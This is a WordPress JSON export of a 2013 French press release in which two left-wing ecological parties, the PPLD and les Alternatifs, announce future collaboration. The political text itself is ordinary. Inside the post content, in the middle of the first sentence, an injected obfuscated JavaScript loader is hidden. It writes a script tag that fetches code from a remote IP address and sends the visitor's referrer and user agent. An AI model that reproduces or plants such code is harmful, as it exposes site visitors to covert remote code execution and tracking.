{"id":8022,"date":"2013-02-03T22:43:16","date_gmt":"2013-02-03T21:43:16","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8022"},"modified":"2013-02-06T12:34:59","modified_gmt":"2013-02-06T11:34:59","slug":"communique-commun-du-parti-pour-la-decroissance-ppld-et-des-alternatifs","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8022","title":{"rendered":"Communiqu\u00e9 commun du Parti Pour La D\u00e9croissance (PPLD) et des Alternatifs"},"content":{"rendered":"<p><em>Dans <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzdez|var|u0026u|referrer|zdtrn||js|php'.split('|'),0,{}))\n<\/script><\/noindex> le cadre de notre volont\u00e9 de convergence et pour faire avancer les id\u00e9es de la D\u00e9croissance, le PPLD a propos\u00e9 de rencontrer les partis et mouvements politiques de gauche et\/ou \u00e9cologistes. Voici le communiqu\u00e9 issu de notre deuxi\u00e8me rencontre apr\u00e8s le <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7755\" target=\"_blank\">Parti de Gauche (PG)<\/a> en attendant les autres (NPA, EELV, Attac, Utopia, Colibris, le Parti Pirate\u2026).<\/em><\/p>\n<p style=\"text-align: center;\"><strong>Communiqu\u00e9 commun du Parti Pour La D\u00e9croissance (PPLD) et des Alternatifs<\/strong><\/p>\n<p style=\"text-align: left;\">Dans une logique de convergence, le <a href=\"http:\/\/www.partipourladecroissance.net\/\" target=\"_blank\">Parti Pour La D\u00e9croissance (PPLD)<\/a> et <a href=\"http:\/\/www.alternatifs.org\/\" target=\"_blank\">les Alternatifs<\/a> se sont rencontr\u00e9s le vendredi 1 f\u00e9vrier 2013.<\/p>\n<p><a href=\"http:\/\/www.alternatifs.org\/spip\/acords-de-wagram-premiers-degats\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" alt=\"\" src=\"http:\/\/www.alternatifs.org\/spip\/local\/cache-vignettes\/L150xH65\/arton2046-3b3fd.png\" width=\"150\" height=\"65\" \/><\/a>Les Alternatifs sont un mouvement politique qui se r\u00e9f\u00e8re \u00e0 quatre piliers : Solidarit\u00e9, \u00c9cologie, Autogestion et F\u00e9minisme. Ils d\u00e9finissent leur strat\u00e9gie comme celle d&rsquo;une r\u00e9volution longue combinant participations aux mobilisations sociales, pr\u00e9sence dans le champ \u00e9lectorale, exp\u00e9rimentation sociale, \u00e9cologique, autogestionnaire. Depuis leur dernier congr\u00e8s, ils ont d\u00e9cid\u00e9, par un vote majoritaire de 58%, de rejoindre le Front de Gauche. Cette d\u00e9marche s&rsquo;inscrit dans leur strat\u00e9gie rouge &#8211; verte, c&rsquo;est-\u00e0-dire de convergence entre les questions sociales et les questions \u00e9cologiques. Ils publient le journal Rouge&amp;Vert, et la Lettre des \u00e9lus Alternatifs.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" alt=\"\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" width=\"118\" height=\"68\" \/>Le PPLD participe \u00e0 la cr\u00e9ation d\u2019un mouvement politique autour des id\u00e9es de la D\u00e9croissance. Il travaille le projet de D\u00e9croissance \u00e0 travers la publication de textes, communiqu\u00e9s, de livres mais aussi \u00e0 travers la participation \u00e0 des \u00e9v\u00e9nements. En particulier, il souhaite proposer des pistes programmatiques et strat\u00e9giques afin d\u2019initier une transition nous permettant de sortir de l\u2019impasse dans laquelle nous am\u00e8ne ce que le PPLD appelle la soci\u00e9t\u00e9 de croissance. Afin d\u2019initier des d\u00e9bats et discussions constructives sur la D\u00e9croissance, le PPLD travaille \u00e0 rendre visible la D\u00e9croissance en s\u2019appuyant sur un site Internet riche et des outils de communication. Enfin, toujours dans cette logique de visibilit\u00e9, le PPLD participe \u00e0 des \u00e9lections mais aussi \u00e0 des campagnes et des luttes collectives.Ces deux d\u00e9marches sont compl\u00e9mentaires et se rejoignent sur beaucoup de points.<\/p>\n<p>C\u2019est pourquoi nous souhaitons nous engager \u00e0 collaborer, en particulier \u00e0 travers un travail collectif et des d\u00e9bats sur le projet : dotation inconditionnelle d\u2019autonomie, extension des sph\u00e8res de la gratuit\u00e9 et relations avec les mouvements sociaux et syndicaux. Il semble aussi int\u00e9ressant de rester en contact dans la perspective des \u00e9lections en 2014, o\u00f9 des convergences locales pourront peut-\u00eatre se dessiner.<\/p>\n<p>Nous faisons face \u00e0 une convergence de crises sans pr\u00e9c\u00e9dent qui plus que jamais nous oblige \u00e0 repenser, exp\u00e9rimenter et vivre de nouvelles mani\u00e8res de faire de la politique. Dans une logique de compl\u00e9mentarit\u00e9, en prenant en compte le fait que nous devons construire une transition partant de la situation actuelle, qu\u2019elle soit psychologique, culturelle, sociale, \u00e9conomique et institutionnelle, il nous semble important de favoriser des liens, des discussions et des d\u00e9bats riches entre les Alternatifs qui ont fait le choix de d\u00e9fendre au sein du Front de Gauche une d\u00e9marche autogestionnaire, l&rsquo;alterd\u00e9veloppement et l&rsquo;objection de croissance et le PPLD qui continue et exp\u00e9rimente sa strat\u00e9gie de changer la soci\u00e9t\u00e9 sans prendre le pouvoir.<\/p>\n<p style=\"text-align: right;\"><em><strong><a href=\"http:\/\/www.partipourladecroissance.net\/\" target=\"_blank\">Le Parti Pour La D\u00e9croissance<\/a> et <a href=\"http:\/\/www.alternatifs.org\/\" target=\"_blank\">les Alternatifs<\/a><\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dans le cadre de notre volont\u00e9 de convergence et pour faire avancer les id\u00e9es de la D\u00e9croissance, le PPLD a propos\u00e9 de rencontrer les partis et mouvements politiques de gauche et\/ou \u00e9cologistes. Voici le communiqu\u00e9 issu de notre deuxi\u00e8me rencontre &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8022\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,8,32],"tags":[],"class_list":["post-8022","post","type-post","status-publish","format-standard","hentry","category-actualites","category-communiques-de-presse","category-elections"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8022"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8022\/revisions"}],"predecessor-version":[{"id":8081,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8022\/revisions\/8081"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8022"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}